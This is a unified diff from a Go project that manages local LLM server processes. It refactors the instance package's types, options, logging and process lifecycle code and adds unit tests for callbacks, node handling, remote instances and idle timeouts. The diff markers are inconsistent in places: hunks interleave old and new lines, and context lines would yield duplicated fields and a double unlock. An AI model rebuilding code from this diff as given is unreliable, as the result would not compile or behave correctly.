 		t.Errorf("Expected port 8080, got %v", backend_options_map["port"])
 	}
 }
 func TestUnmarshalJSON(t *testing.T) {
@@ -295,7 +287,7 @@ func TestUnmarshalJSON(t *testing.T) {
 		}
 	}`
-	var inst instance.Process
+	var inst instance.Instance
 	err := json.Unmarshal([]byte(jsonData), &inst)
 	if err != nil {
 		t.Fatalf("JSON unmarshal failed: %v", err)
@@ -312,14 +304,14 @@ func TestUnmarshalJSON(t *testing.T) {
 	if opts == nil {
 		t.Fatal("Expected options to be set")
 	}
-	if opts.BackendType != backends.BackendTypeLlamaCpp {
+	if opts.BackendOptions.BackendType != backends.BackendTypeLlamaCpp {
-		t.Errorf("Expected backend_type '%s', got %s", backends.BackendTypeLlamaCpp, opts.BackendType)
+		t.Errorf("Expected backend_type '%s', got %s", backends.BackendTypeLlamaCpp, opts.BackendOptions.BackendType)
 	}
-	if opts.LlamaServerOptions == nil {
+	if opts.BackendOptions.LlamaServerOptions == nil {
 		t.Fatal("Expected LlamaServerOptions to be set")
 	}
-	if opts.LlamaServerOptions.Model != "/path/to/model.gguf" {
+	if opts.BackendOptions.LlamaServerOptions.Model != "/path/to/model.gguf" {
-		t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model)
+		t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.BackendOptions.LlamaServerOptions.Model)
 	}
 	if inst.GetPort() != 8080 {
 		t.Errorf("Expected port 8080, got %d", inst.GetPort())
@@ -332,7 +324,7 @@ func TestUnmarshalJSON(t *testing.T) {
 	}
 }
-func TestCreateInstanceOptionsValidation(t *testing.T) {
+func TestCreateOptionsValidation(t *testing.T) {
 	tests := []struct {
 		name          string
 		maxRestarts   *int
@@ -363,30 +355,45 @@ func TestCreateInstanceOptionsValidation(t *testing.T) {
 		},
 	}
-	backendConfig := &config.BackendConfig{
+	globalConfig := &config.AppConfig{
-		LlamaExecutable: "llama-server",
+		Backends: config.BackendConfig{
-		MLXLMExecutable: "mlx_lm.server",
+			LlamaCpp: config.BackendSettings{
-	}
+				Command: "llama-server",
-
+				Args:    []string{},
-	globalSettings := &config.InstancesConfig{
+			},
-		LogsDir: "/tmp/test",
+			MLX: config.BackendSettings{
 				Command: "mlx_lm.server",
 				Args:    []string{},
 			},
 			VLLM: config.BackendSettings{
 				Command: "vllm",
 				Args:    []string{"serve"},
 			},
 		},
 		Instances: config.InstancesConfig{
 			LogsDir: "/tmp/test",
 		},
 		Nodes:     map[string]config.NodeConfig{},
 		LocalNode: "main",
 	}
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			options := &instance.CreateInstanceOptions{
+			options := &instance.Options{
 				MaxRestarts:  tt.maxRestarts,
 				RestartDelay: tt.restartDelay,
-				BackendType:  backends.BackendTypeLlamaCpp,
+				BackendOptions: backends.Options{
-				LlamaServerOptions: &llamacpp.LlamaServerOptions{
+					BackendType: backends.BackendTypeLlamaCpp,
-					Model: "/path/to/model.gguf",
+					LlamaServerOptions: &backends.LlamaServerOptions{
 						Model: "/path/to/model.gguf",
 					},
 				},
 			}
 			// Mock onStatusChange function
-			mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
+			mockOnStatusChange := func(oldStatus, newStatus instance.Status) {}
-			instance := instance.NewInstance("test", backendConfig, globalSettings, options, mockOnStatusChange)
+			instance := instance.New("test", globalConfig, options, mockOnStatusChange)
 			opts := instance.GetOptions()
 			if opts.MaxRestarts == nil {
@@ -403,3 +410,300 @@ func TestCreateInstanceOptionsValidation(t *testing.T) {
 		})
 	}
 }
 // TestStatusChangeCallback verifies that SetStatus invokes the callback passed
 // to instance.New, handing it the previous status (expected to be Stopped) and
 // the newly set status (Running).
 func TestStatusChangeCallback(t *testing.T) {
 	cfg := &config.AppConfig{
 		Backends: config.BackendConfig{
 			LlamaCpp: config.BackendSettings{Command: "llama-server"},
 		},
 		Instances: config.InstancesConfig{LogsDir: "/tmp/test"},
 		Nodes:     map[string]config.NodeConfig{},
 		LocalNode: "main",
 	}
 	opts := &instance.Options{
 		BackendOptions: backends.Options{
 			BackendType: backends.BackendTypeLlamaCpp,
 			LlamaServerOptions: &backends.LlamaServerOptions{
 				Model: "/path/to/model.gguf",
 			},
 		},
 	}
 	// Captured arguments of the most recent callback invocation.
 	var (
 		seenOld, seenNew instance.Status
 		fired            bool
 	)
 	record := func(oldStatus, newStatus instance.Status) {
 		seenOld, seenNew, fired = oldStatus, newStatus, true
 	}
 	inst := instance.New("test", cfg, opts, record)
 	inst.SetStatus(instance.Running)
 	if !fired {
 		t.Error("Expected status change callback to be called")
 	}
 	if seenOld != instance.Stopped {
 		t.Errorf("Expected old status Stopped, got %v", seenOld)
 	}
 	if seenNew != instance.Running {
 		t.Errorf("Expected new status Running, got %v", seenNew)
 	}
 }
 // TestSetOptions_NodesPreserved verifies that SetOptions keeps the node
 // assignment the instance was created with, while still applying the other
 // updated options (here: the model path).
 func TestSetOptions_NodesPreserved(t *testing.T) {
 	cfg := &config.AppConfig{
 		Backends: config.BackendConfig{
 			LlamaCpp: config.BackendSettings{Command: "llama-server"},
 		},
 		Instances: config.InstancesConfig{LogsDir: "/tmp/test"},
 		Nodes:     map[string]config.NodeConfig{},
 		LocalNode: "main",
 	}
 	// llamaOptions builds llama.cpp instance options for the given node set and model path.
 	llamaOptions := func(nodes map[string]struct{}, model string) *instance.Options {
 		return &instance.Options{
 			Nodes: nodes,
 			BackendOptions: backends.Options{
 				BackendType: backends.BackendTypeLlamaCpp,
 				LlamaServerOptions: &backends.LlamaServerOptions{
 					Model: model,
 				},
 			},
 		}
 	}
 	const updatedModel = "/path/to/new-model.gguf"
 	cases := []struct {
 		name          string
 		initialNodes  map[string]struct{}
 		updateNodes   map[string]struct{}
 		expectedNodes map[string]struct{}
 	}{
 		{
 			name:          "nil nodes preserved as nil",
 			initialNodes:  nil,
 			updateNodes:   map[string]struct{}{"worker1": {}},
 			expectedNodes: nil,
 		},
 		{
 			name:          "empty nodes preserved as empty",
 			initialNodes:  map[string]struct{}{},
 			updateNodes:   map[string]struct{}{"worker1": {}},
 			expectedNodes: map[string]struct{}{},
 		},
 		{
 			name:          "existing nodes preserved",
 			initialNodes:  map[string]struct{}{"worker1": {}, "worker2": {}},
 			updateNodes:   map[string]struct{}{"worker3": {}},
 			expectedNodes: map[string]struct{}{"worker1": {}, "worker2": {}},
 		},
 	}
 	for _, tc := range cases {
 		t.Run(tc.name, func(t *testing.T) {
 			inst := instance.New("test", cfg, llamaOptions(tc.initialNodes, "/path/to/model.gguf"), nil)
 			// The update carries a different node set, which is expected to be ignored.
 			inst.SetOptions(llamaOptions(tc.updateNodes, updatedModel))
 			got := inst.GetOptions()
 			// The node set must still match what the instance was created with.
 			if want, have := len(tc.expectedNodes), len(got.Nodes); have != want {
 				t.Errorf("Expected %d nodes, got %d", want, have)
 			}
 			for name := range tc.expectedNodes {
 				if _, ok := got.Nodes[name]; !ok {
 					t.Errorf("Expected node %s to exist", name)
 				}
 			}
 			// Everything else in the update must have been applied.
 			if model := got.BackendOptions.LlamaServerOptions.Model; model != updatedModel {
 				t.Errorf("Expected model to be updated to '/path/to/new-model.gguf', got %q", model)
 			}
 		})
 	}
 }
 // TestProcessErrorCases verifies that Stop on a non-running instance and Start
 // on an instance whose status is Running both return an error.
 func TestProcessErrorCases(t *testing.T) {
 	cfg := &config.AppConfig{
 		Backends: config.BackendConfig{
 			LlamaCpp: config.BackendSettings{Command: "llama-server"},
 		},
 		Instances: config.InstancesConfig{LogsDir: "/tmp/test"},
 		Nodes:     map[string]config.NodeConfig{},
 		LocalNode: "main",
 	}
 	opts := &instance.Options{
 		BackendOptions: backends.Options{
 			BackendType: backends.BackendTypeLlamaCpp,
 			LlamaServerOptions: &backends.LlamaServerOptions{
 				Model: "/path/to/model.gguf",
 			},
 		},
 	}
 	inst := instance.New("test", cfg, opts, nil)
 	// A freshly created instance is not running, so Stop must be rejected.
 	if stopErr := inst.Stop(); stopErr == nil {
 		t.Error("Expected error when stopping non-running instance")
 	}
 	// Pretend the instance is running without launching a process.
 	inst.SetStatus(instance.Running)
 	// Start must be rejected while the status is Running.
 	if startErr := inst.Start(); startErr == nil {
 		t.Error("Expected error when starting already running instance")
 	}
 }
 // TestRemoteInstanceOperations verifies how an instance assigned to a remote
 // node behaves: Start, Stop, Restart and GetLogs must return an error, while
 // GetProxy must succeed.
 func TestRemoteInstanceOperations(t *testing.T) {
 	cfg := &config.AppConfig{
 		Backends: config.BackendConfig{
 			LlamaCpp: config.BackendSettings{Command: "llama-server"},
 		},
 		Instances: config.InstancesConfig{LogsDir: "/tmp/test"},
 		Nodes: map[string]config.NodeConfig{
 			"remote-node": {Address: "http://remote-node:8080"},
 		},
 		LocalNode: "main",
 	}
 	// Assigning the instance to "remote-node" (not the local node "main") makes it remote.
 	remoteNodes := map[string]struct{}{"remote-node": {}}
 	opts := &instance.Options{
 		Nodes: remoteNodes,
 		BackendOptions: backends.Options{
 			BackendType: backends.BackendTypeLlamaCpp,
 			LlamaServerOptions: &backends.LlamaServerOptions{
 				Model: "/path/to/model.gguf",
 			},
 		},
 	}
 	remote := instance.New("remote-test", cfg, opts, nil)
 	if !remote.IsRemote() {
 		t.Error("Expected instance to be remote")
 	}
 	// Lifecycle operations are expected to be rejected for a remote instance.
 	startErr := remote.Start()
 	if startErr == nil {
 		t.Error("Expected error when starting remote instance")
 	}
 	stopErr := remote.Stop()
 	if stopErr == nil {
 		t.Error("Expected error when stopping remote instance")
 	}
 	restartErr := remote.Restart()
 	if restartErr == nil {
 		t.Error("Expected error when restarting remote instance")
 	}
 	// GetProxy is expected to succeed for a remote instance.
 	_, proxyErr := remote.GetProxy()
 	if proxyErr != nil {
 		t.Error("Expected no error when getting proxy for remote instance")
 	}
 	// GetLogs is expected to be rejected for a remote instance.
 	_, logsErr := remote.GetLogs(10)
 	if logsErr == nil {
 		t.Error("Expected error when getting logs for remote instance")
 	}
 }
 // TestIdleTimeout exercises ShouldTimeout in three situations: an instance that
 // is not running, a running instance without an idle timeout, and a running
 // instance whose idle time (driven by a mock clock) exceeds its timeout.
 func TestIdleTimeout(t *testing.T) {
 	cfg := &config.AppConfig{
 		Backends: config.BackendConfig{
 			LlamaCpp: config.BackendSettings{Command: "llama-server"},
 		},
 		Instances: config.InstancesConfig{LogsDir: "/tmp/test"},
 		Nodes:     map[string]config.NodeConfig{},
 		LocalNode: "main",
 	}
 	// withIdle builds llama.cpp instance options with the given idle timeout and server options.
 	withIdle := func(idle *int, llama *backends.LlamaServerOptions) *instance.Options {
 		return &instance.Options{
 			IdleTimeout: idle,
 			BackendOptions: backends.Options{
 				BackendType:        backends.BackendTypeLlamaCpp,
 				LlamaServerOptions: llama,
 			},
 		}
 	}
 	t.Run("not running never times out", func(t *testing.T) {
 		timeout := 1
 		inst := instance.New("test", cfg, withIdle(&timeout, &backends.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 		}), nil)
 		if inst.ShouldTimeout() {
 			t.Error("Non-running instance should never timeout")
 		}
 	})
 	t.Run("no timeout configured", func(t *testing.T) {
 		// A nil IdleTimeout means no timeout is configured.
 		inst := instance.New("test", cfg, withIdle(nil, &backends.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 		}), nil)
 		inst.SetStatus(instance.Running)
 		if inst.ShouldTimeout() {
 			t.Error("Instance with no timeout configured should not timeout")
 		}
 	})
 	t.Run("timeout exceeded", func(t *testing.T) {
 		timeout := 1 // 1 minute
 		inst := instance.New("test", cfg, withIdle(&timeout, &backends.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 			Host:  "localhost",
 			Port:  8080,
 		}), nil)
 		inst.SetStatus(instance.Running)
 		// Replace the clock with one the test controls.
 		clock := &mockTimeProvider{currentTime: time.Now().Unix()}
 		inst.SetTimeProvider(clock)
 		// Record "now" (per the mock clock) as the last request time.
 		inst.UpdateLastRequestTime()
 		// Move the clock 2 minutes ahead, past the 1 minute timeout.
 		clock.currentTime = time.Now().Add(2 * time.Minute).Unix()
 		if !inst.ShouldTimeout() {
 			t.Error("Instance should timeout when idle time exceeds configured timeout")
 		}
 	})
 }
 // mockTimeProvider for timeout testing
 type mockTimeProvider struct {
 	currentTime int64 // Unix timestamp
 }
 func (m *mockTimeProvider) Now() time.Time {
 	return time.Unix(m.currentTime, 0)
 }
--- a/pkg/instance/lifecycle.go
+++ b/pkg/instance/lifecycle.go
@@ -1,374 +0,0 @@
 package instance
 import (
 	"context"
 	"fmt"
 	"log"
 	"net/http"
 	"os/exec"
 	"runtime"
 	"syscall"
 	"time"
 	"llamactl/pkg/backends"
 )
 // Start launches the backend server process for this instance.
 //
 // i.mu is held for the whole call. An error is returned when the instance is
 // already running, has no options, uses an unsupported backend type, or when
 // the log files, the output pipes or the process itself cannot be set up.
 // Once the log files and the command context exist, every failure path
 // releases them again so that a failed start does not leak them.
 func (i *Process) Start() error {
 	i.mu.Lock()
 	defer i.mu.Unlock()
 	if i.IsRunning() {
 		return fmt.Errorf("instance %s is already running", i.Name)
 	}
 	// Safety check: ensure options are valid
 	if i.options == nil {
 		return fmt.Errorf("instance %s has no options set", i.Name)
 	}
 	// Reset restart counter when manually starting (not during auto-restart)
 	// We can detect auto-restart by checking if restartCancel is set
 	if i.restartCancel == nil {
 		i.restarts = 0
 	}
 	// Initialize last request time to current time when starting
 	i.lastRequestTime.Store(i.timeProvider.Now().Unix())
 	// Create log files
 	if err := i.logger.Create(); err != nil {
 		return fmt.Errorf("failed to create log files: %w", err)
 	}
 	args := i.options.BuildCommandArgs()
 	i.ctx, i.cancel = context.WithCancel(context.Background())
 	// abortStart releases what was set up above (the cancelable context and the
 	// open log files) when a later step fails.
 	abortStart := func() {
 		i.cancel()
 		i.logger.Close()
 	}
 	var executable string
 	// Get executable from global configuration
 	switch i.options.BackendType {
 	case backends.BackendTypeLlamaCpp:
 		executable = i.globalBackendSettings.LlamaExecutable
 	case backends.BackendTypeMlxLm:
 		executable = i.globalBackendSettings.MLXLMExecutable
 	case backends.BackendTypeVllm:
 		executable = i.globalBackendSettings.VllmExecutable
 	default:
 		abortStart()
 		return fmt.Errorf("unsupported backend type: %s", i.options.BackendType)
 	}
 	i.cmd = exec.CommandContext(i.ctx, executable, args...)
 	if runtime.GOOS != "windows" {
 		setProcAttrs(i.cmd)
 	}
 	var err error
 	i.stdout, err = i.cmd.StdoutPipe()
 	if err != nil {
 		abortStart()
 		return fmt.Errorf("failed to get stdout pipe: %w", err)
 	}
 	i.stderr, err = i.cmd.StderrPipe()
 	if err != nil {
 		// The stdout pipe was already created and must be closed by us.
 		i.stdout.Close()
 		abortStart()
 		return fmt.Errorf("failed to get stderr pipe: %w", err)
 	}
 	if err := i.cmd.Start(); err != nil {
 		abortStart()
 		return fmt.Errorf("failed to start instance %s: %w", i.Name, err)
 	}
 	i.SetStatus(Running)
 	// Create channel for monitor completion signaling
 	i.monitorDone = make(chan struct{})
 	// Forward process output to the log file and watch for process exit.
 	go i.logger.readOutput(i.stdout)
 	go i.logger.readOutput(i.stderr)
 	go i.monitorProcess()
 	return nil
 }
 // Stop terminates the subprocess.
 //
 // If the instance is not running, any pending restart is cancelled and an
 // error is returned. Otherwise the status is set to Stopped, the process is
 // sent SIGINT, and Stop waits up to 30 seconds for the monitor goroutine to
 // signal completion before force-killing the process. The log files are closed
 // before returning. On these paths Stop returns nil even when signalling or
 // killing the process fails; such failures are only logged.
 func (i *Process) Stop() error {
 	i.mu.Lock()
 	if !i.IsRunning() {
 		// Even if not running, cancel any pending restart
 		if i.restartCancel != nil {
 			i.restartCancel()
 			i.restartCancel = nil
 			log.Printf("Cancelled pending restart for instance %s", i.Name)
 		}
 		i.mu.Unlock()
 		return fmt.Errorf("instance %s is not running", i.Name)
 	}
 	// Cancel any pending restart
 	if i.restartCancel != nil {
 		i.restartCancel()
 		i.restartCancel = nil
 	}
 	// Set status to stopped first to signal intentional stop
 	// (monitorProcess returns early when it sees the instance is not running)
 	i.SetStatus(Stopped)
 	// Clean up the proxy
 	i.proxy = nil
 	// Get the monitor done channel before releasing the lock
 	// (monitorProcess sets i.monitorDone to nil after closing it)
 	monitorDone := i.monitorDone
 	i.mu.Unlock()
 	// NOTE(review): i.cmd is read below without holding i.mu — confirm no
 	// concurrent Start can replace it at this point.
 	// Stop the process with SIGINT if cmd exists
 	if i.cmd != nil && i.cmd.Process != nil {
 		if err := i.cmd.Process.Signal(syscall.SIGINT); err != nil {
 			log.Printf("Failed to send SIGINT to instance %s: %v", i.Name, err)
 		}
 	}
 	// If no process exists, we can return immediately
 	if i.cmd == nil || monitorDone == nil {
 		i.logger.Close()
 		return nil
 	}
 	select {
 	case <-monitorDone:
 		// Process exited normally
 	case <-time.After(30 * time.Second):
 		// Force kill if it doesn't exit within 30 seconds
 		if i.cmd != nil && i.cmd.Process != nil {
 			killErr := i.cmd.Process.Kill()
 			if killErr != nil {
 				log.Printf("Failed to force kill instance %s: %v", i.Name, killErr)
 			}
 			log.Printf("Instance %s did not stop in time, force killed", i.Name)
 			// Wait a bit more for the monitor to finish after force kill
 			select {
 			case <-monitorDone:
 				// Monitor completed after force kill
 			case <-time.After(2 * time.Second):
 				log.Printf("Warning: Monitor goroutine did not complete after force kill for instance %s", i.Name)
 			}
 		}
 	}
 	i.logger.Close()
 	return nil
 }
 // LastRequestTime returns the value currently held in lastRequestTime, which
 // Start initializes to the time provider's current Unix time in seconds.
 func (i *Process) LastRequestTime() int64 {
 	last := i.lastRequestTime.Load()
 	return last
 }
 // WaitForHealthy blocks until the instance's backend answers GET /health with
 // HTTP 200, or until the timeout elapses.
 //
 // timeout is in seconds; values <= 0 fall back to 30 seconds. An error is
 // returned when the instance is not running, has no options, or does not
 // become healthy in time.
 func (i *Process) WaitForHealthy(timeout int) error {
 	if !i.IsRunning() {
 		return fmt.Errorf("instance %s is not running", i.Name)
 	}
 	if timeout <= 0 {
 		timeout = 30 // Default to 30 seconds if no timeout is specified
 	}
 	// ctx bounds the whole wait, including every individual health request.
 	ctx, cancel := context.WithTimeout(context.Background(), time.Duration(timeout)*time.Second)
 	defer cancel()
 	// Get instance options to build the health check URL
 	opts := i.GetOptions()
 	if opts == nil {
 		return fmt.Errorf("instance %s has no options set", i.Name)
 	}
 	// Build the health check URL directly
 	// host and port stay at their zero values ("" and 0) when the
 	// backend-specific options for the configured backend type are nil.
 	var host string
 	var port int
 	switch opts.BackendType {
 	case backends.BackendTypeLlamaCpp:
 		if opts.LlamaServerOptions != nil {
 			host = opts.LlamaServerOptions.Host
 			port = opts.LlamaServerOptions.Port
 		}
 	case backends.BackendTypeMlxLm:
 		if opts.MlxServerOptions != nil {
 			host = opts.MlxServerOptions.Host
 			port = opts.MlxServerOptions.Port
 		}
 	case backends.BackendTypeVllm:
 		if opts.VllmServerOptions != nil {
 			host = opts.VllmServerOptions.Host
 			port = opts.VllmServerOptions.Port
 		}
 	}
 	// An empty host falls back to localhost.
 	if host == "" {
 		host = "localhost"
 	}
 	healthURL := fmt.Sprintf("http://%s:%d/health", host, port)
 	// Create a dedicated HTTP client for health checks
 	client := &http.Client{
 		Timeout: 5 * time.Second, // 5 second timeout per request
 	}
 	// Helper function to check health directly
 	// Any request error or non-200 status counts as "not healthy yet".
 	checkHealth := func() bool {
 		req, err := http.NewRequestWithContext(ctx, "GET", healthURL, nil)
 		if err != nil {
 			return false
 		}
 		resp, err := client.Do(req)
 		if err != nil {
 			return false
 		}
 		defer resp.Body.Close()
 		return resp.StatusCode == http.StatusOK
 	}
 	// Try immediate check first
 	if checkHealth() {
 		return nil // Instance is healthy
 	}
 	// If immediate check failed, start polling
 	// (one attempt per second until ctx expires)
 	ticker := time.NewTicker(1 * time.Second)
 	defer ticker.Stop()
 	for {
 		select {
 		case <-ctx.Done():
 			return fmt.Errorf("timeout waiting for instance %s to become healthy after %d seconds", i.Name, timeout)
 		case <-ticker.C:
 			if checkHealth() {
 				return nil // Instance is healthy
 			}
 			// Continue polling
 		}
 	}
 }
 // monitorProcess waits for the subprocess to exit and reacts to it. Start runs
 // it in its own goroutine.
 //
 // If the instance is no longer marked running when the process exits (an
 // intentional stop), it returns without further action. Otherwise it sets the
 // status to Stopped, closes the log files and, when the process exited with an
 // error, hands over to handleRestart. On return, the deferred function closes
 // and clears i.monitorDone to signal completion to waiters such as Stop.
 func (i *Process) monitorProcess() {
 	// NOTE(review): the deferred function reads i.monitorDone when it runs, not
 	// when monitorProcess starts. After a successful auto-restart, Start has
 	// already assigned a new channel, so this appears to close the new
 	// channel — confirm.
 	defer func() {
 		i.mu.Lock()
 		if i.monitorDone != nil {
 			close(i.monitorDone)
 			i.monitorDone = nil
 		}
 		i.mu.Unlock()
 	}()
 	err := i.cmd.Wait()
 	i.mu.Lock()
 	// Check if the instance was intentionally stopped
 	if !i.IsRunning() {
 		i.mu.Unlock()
 		return
 	}
 	i.SetStatus(Stopped)
 	i.logger.Close()
 	// Cancel any existing restart context since we're handling a new exit
 	if i.restartCancel != nil {
 		i.restartCancel()
 		i.restartCancel = nil
 	}
 	// Log the exit
 	if err != nil {
 		log.Printf("Instance %s crashed with error: %v", i.Name, err)
 		// Handle restart while holding the lock, then release it
 		// (handleRestart unlocks i.mu on every path)
 		i.handleRestart()
 	} else {
 		log.Printf("Instance %s exited cleanly", i.Name)
 		i.mu.Unlock()
 	}
 }
 // handleRestart manages the restart process while holding the lock.
 //
 // It must be called with i.mu locked and unlocks it on every path. When the
 // restart conditions are not met, the status is set to Failed. Otherwise the
 // restart counter is incremented, a cancellable delay of RestartDelay seconds
 // is awaited without the lock, and Start is called unless the delay was
 // cancelled through restartCancel.
 func (i *Process) handleRestart() {
 	// Validate restart conditions and get safe parameters
 	shouldRestart, maxRestarts, restartDelay := i.validateRestartConditions()
 	if !shouldRestart {
 		i.SetStatus(Failed)
 		i.mu.Unlock()
 		return
 	}
 	i.restarts++
 	log.Printf("Auto-restarting instance %s (attempt %d/%d) in %v",
 		i.Name, i.restarts, maxRestarts, time.Duration(restartDelay)*time.Second)
 	// Create a cancellable context for the restart delay
 	// (a non-nil restartCancel also tells Start not to reset the restart counter)
 	restartCtx, cancel := context.WithCancel(context.Background())
 	i.restartCancel = cancel
 	// Release the lock before sleeping
 	i.mu.Unlock()
 	// Use context-aware sleep so it can be cancelled
 	select {
 	case <-time.After(time.Duration(restartDelay) * time.Second):
 		// Sleep completed normally, continue with restart
 	case <-restartCtx.Done():
 		// Restart was cancelled
 		log.Printf("Restart cancelled for instance %s", i.Name)
 		return
 	}
 	// Restart the instance
 	// (Start acquires i.mu itself, so the lock must not be held here)
 	if err := i.Start(); err != nil {
 		log.Printf("Failed to restart instance %s: %v", i.Name, err)
 	} else {
 		log.Printf("Successfully restarted instance %s", i.Name)
 		// Clear the cancel function
 		i.mu.Lock()
 		i.restartCancel = nil
 		i.mu.Unlock()
 	}
 }
 // validateRestartConditions decides whether an automatic restart may happen.
 // It returns (true, MaxRestarts, RestartDelay) when options are present,
 // AutoRestart is enabled, both limits are set and the restart counter is still
 // below MaxRestarts; otherwise it logs the reason and returns (false, 0, 0).
 func (i *Process) validateRestartConditions() (shouldRestart bool, maxRestarts int, restartDelay int) {
 	cfg := i.options
 	switch {
 	case cfg == nil:
 		log.Printf("Instance %s not restarting: options are nil", i.Name)
 		return false, 0, 0
 	case cfg.AutoRestart == nil || !*cfg.AutoRestart:
 		log.Printf("Instance %s not restarting: AutoRestart is disabled", i.Name)
 		return false, 0, 0
 	case cfg.MaxRestarts == nil:
 		log.Printf("Instance %s not restarting: MaxRestarts is nil", i.Name)
 		return false, 0, 0
 	case cfg.RestartDelay == nil:
 		log.Printf("Instance %s not restarting: RestartDelay is nil", i.Name)
 		return false, 0, 0
 	}
 	// Both pointers are non-nil here; their values are used as-is.
 	limit, delay := *cfg.MaxRestarts, *cfg.RestartDelay
 	if i.restarts >= limit {
 		log.Printf("Instance %s exceeded max restart attempts (%d)", i.Name, limit)
 		return false, 0, 0
 	}
 	return true, limit, delay
 }
--- a/pkg/instance/logging.go
+++ b/pkg/instance/logging.go
@@ -6,25 +6,30 @@ import (
 	"io"
 	"os"
 	"strings"
 	"sync"
 	"time"
 )
-type InstanceLogger struct {
+type logger struct {
 	name        string
 	logDir      string
 	logFile     *os.File
 	logFilePath string
 	mu          sync.RWMutex
 }
-func NewInstanceLogger(name string, logDir string) *InstanceLogger {
+func newLogger(name string, logDir string) *logger {
-	return &InstanceLogger{
+	return &logger{
 		name:   name,
 		logDir: logDir,
 	}
 }
-// Create creates and opens the log files for stdout and stderr
+// create creates and opens the log files for stdout and stderr
-func (i *InstanceLogger) Create() error {
+func (i *logger) create() error {
 	i.mu.Lock()
 	defer i.mu.Unlock()
 	if i.logDir == "" {
 		return fmt.Errorf("logDir is empty for instance %s", i.name)
 	}
@@ -51,17 +56,16 @@ func (i *InstanceLogger) Create() error {
 	return nil
 }
-// GetLogs retrieves the last n lines of logs from the instance
+// getLogs retrieves the last n lines of logs from the instance
-func (i *Process) GetLogs(num_lines int) (string, error) {
+func (i *logger) getLogs(num_lines int) (string, error) {
 	i.mu.RLock()
-	logFileName := i.logger.logFilePath
+	defer i.mu.RUnlock()
 	i.mu.RUnlock()
-	if logFileName == "" {
+	if i.logFilePath == "" {
-		return "", fmt.Errorf("log file not created for instance %s", i.Name)
+		return "", fmt.Errorf("log file not created for instance %s", i.name)
 	}
-	file, err := os.Open(logFileName)
+	file, err := os.Open(i.logFilePath)
 	if err != nil {
 		return "", fmt.Errorf("failed to open log file: %w", err)
 	}
@@ -93,8 +97,11 @@ func (i *Process) GetLogs(num_lines int) (string, error) {
 	return strings.Join(lines[start:], "\n"), nil
 }
-// closeLogFile closes the log files
+// close closes the log files
-func (i *InstanceLogger) Close() {
+func (i *logger) close() {
 	i.mu.Lock()
 	defer i.mu.Unlock()
 	if i.logFile != nil {
 		timestamp := time.Now().Format("2006-01-02 15:04:05")
 		fmt.Fprintf(i.logFile, "=== Instance %s stopped at %s ===\n\n", i.name, timestamp)
@@ -104,7 +111,7 @@ func (i *InstanceLogger) Close() {
 }
 // readOutput reads from the given reader and writes lines to the log file
-func (i *InstanceLogger) readOutput(reader io.ReadCloser) {
+func (i *logger) readOutput(reader io.ReadCloser) {
 	defer reader.Close()
 	scanner := bufio.NewScanner(reader)
--- a/pkg/instance/options.go
+++ b/pkg/instance/options.go
@@ -4,14 +4,14 @@ import (
 	"encoding/json"
 	"fmt"
 	"llamactl/pkg/backends"
 	"llamactl/pkg/backends/llamacpp"
 	"llamactl/pkg/backends/mlx"
 	"llamactl/pkg/backends/vllm"
 	"llamactl/pkg/config"
 	"log"
 	"slices"
 	"sync"
 )
-type CreateInstanceOptions struct {
+// Options contains the actual configuration (exported - this is the public API).
 type Options struct {
 	// Auto restart
 	AutoRestart  *bool `json:"auto_restart,omitempty"`
 	MaxRestarts  *int  `json:"max_restarts,omitempty"`
@@ -20,21 +20,79 @@ type CreateInstanceOptions struct {
 	OnDemandStart *bool `json:"on_demand_start,omitempty"`
 	// Idle timeout
 	IdleTimeout *int `json:"idle_timeout,omitempty"` // minutes
-
+	// Environment variables
-	BackendType    backends.BackendType `json:"backend_type"`
+	Environment map[string]string `json:"environment,omitempty"`
-	BackendOptions map[string]any       `json:"backend_options,omitempty"`
+	// Assigned nodes
-
+	Nodes map[string]struct{} `json:"-"`
-	// Backend-specific options
+	// Backend options
-	LlamaServerOptions *llamacpp.LlamaServerOptions `json:"-"`
+	BackendOptions backends.Options `json:"-"`
 	MlxServerOptions   *mlx.MlxServerOptions        `json:"-"`
 	VllmServerOptions  *vllm.VllmServerOptions      `json:"-"`
 }
-// UnmarshalJSON implements custom JSON unmarshaling for CreateInstanceOptions
+// options wraps Options with thread-safe access (unexported).
-func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
+type options struct {
 	mu   sync.RWMutex
 	opts *Options
 }
 // newOptions wraps opts in a new options value with a zero-value mutex.
 func newOptions(opts *Options) *options {
 	wrapped := new(options)
 	wrapped.opts = opts
 	return wrapped
 }
 // get returns the currently stored *Options under the read lock. The pointer
 // itself is returned (no copy is made), so callers share the same Options value.
 func (o *options) get() *Options {
 	o.mu.RLock()
 	current := o.opts
 	o.mu.RUnlock()
 	return current
 }
 // set replaces the stored *Options with opts under the write lock.
 func (o *options) set(opts *Options) {
 	o.mu.Lock()
 	o.opts = opts
 	o.mu.Unlock()
 }
 // GetHost returns the host reported by the stored backend options, read under
 // the read lock.
 func (o *options) GetHost() string {
 	o.mu.RLock()
 	defer o.mu.RUnlock()
 	host := o.opts.BackendOptions.GetHost()
 	return host
 }
 // GetPort returns the port reported by the stored backend options, read under
 // the read lock.
 func (o *options) GetPort() int {
 	o.mu.RLock()
 	defer o.mu.RUnlock()
 	port := o.opts.BackendOptions.GetPort()
 	return port
 }
 // MarshalJSON implements json.Marshaler for the options wrapper by delegating
 // to the wrapped Options while holding the read lock.
 func (o *options) MarshalJSON() ([]byte, error) {
 	o.mu.RLock()
 	defer o.mu.RUnlock()
 	encoded, err := o.opts.MarshalJSON()
 	return encoded, err
 }
 // UnmarshalJSON implements json.Unmarshaler for the options wrapper. It holds
 // the write lock, allocates the wrapped Options if none is stored yet, and
 // delegates decoding to it.
 func (o *options) UnmarshalJSON(data []byte) error {
 	o.mu.Lock()
 	defer o.mu.Unlock()
 	target := o.opts
 	if target == nil {
 		target = &Options{}
 		o.opts = target
 	}
 	return target.UnmarshalJSON(data)
 }
 // UnmarshalJSON implements custom JSON unmarshaling for Options
 func (c *Options) UnmarshalJSON(data []byte) error {
 	// Use anonymous struct to avoid recursion
-	type Alias CreateInstanceOptions
+	type Alias Options
 	aux := &struct {
 		Nodes          []string             `json:"nodes,omitempty"`
